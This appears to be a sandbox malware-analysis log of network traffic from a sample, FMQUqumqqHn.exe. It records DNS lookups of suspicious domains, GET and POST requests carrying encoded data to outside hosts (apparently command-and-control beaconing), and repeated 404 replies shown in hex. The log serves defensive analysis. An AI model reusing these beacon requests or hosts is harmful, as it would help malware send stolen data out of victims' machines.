Source: global traffic	HTTP traffic detected: GET /y3dc/?XRWLl=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&p2J=sbJxX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.migorengya8.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.huiguang.xyz
Source: global traffic	DNS traffic detected: DNS query: www.beingandbecoming.ltd
Source: global traffic	DNS traffic detected: DNS query: www.futurevision.life
Source: global traffic	DNS traffic detected: DNS query: www.schedulemassage.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mcfunding.org
Source: global traffic	DNS traffic detected: DNS query: www.migorengya8.click

Source: unknown

HTTP traffic detected: POST /79tr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 202Cache-Control: no-cacheOrigin: http://www.beingandbecoming.ltdReferer: http://www.beingandbecoming.ltd/79tr/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 58 52 57 4c 6c 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 71 47 4b 5a 4b 53 74 6b 71 6a 68 36 52 4e 4b 2f 4f 62 79 5a 37 64 33 69 65 6d 4f 63 55 73 6e 6b 77 3d 3d Data Ascii: XRWLl=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWqGKZKStkqjh6RNK/ObyZ7d3iemOcUsnkw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 02:23:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 02:23:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 02:23:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 02:23:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 18 Nov 2024 02:24:09 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 18 Nov 2024 02:24:11 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 18 Nov 2024 02:24:14 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 18 Nov 2024 02:24:17 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: FMQUqumqqHn.exe, 00000008.00000002.3009849528.0000000004F69000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.migorengya8.click
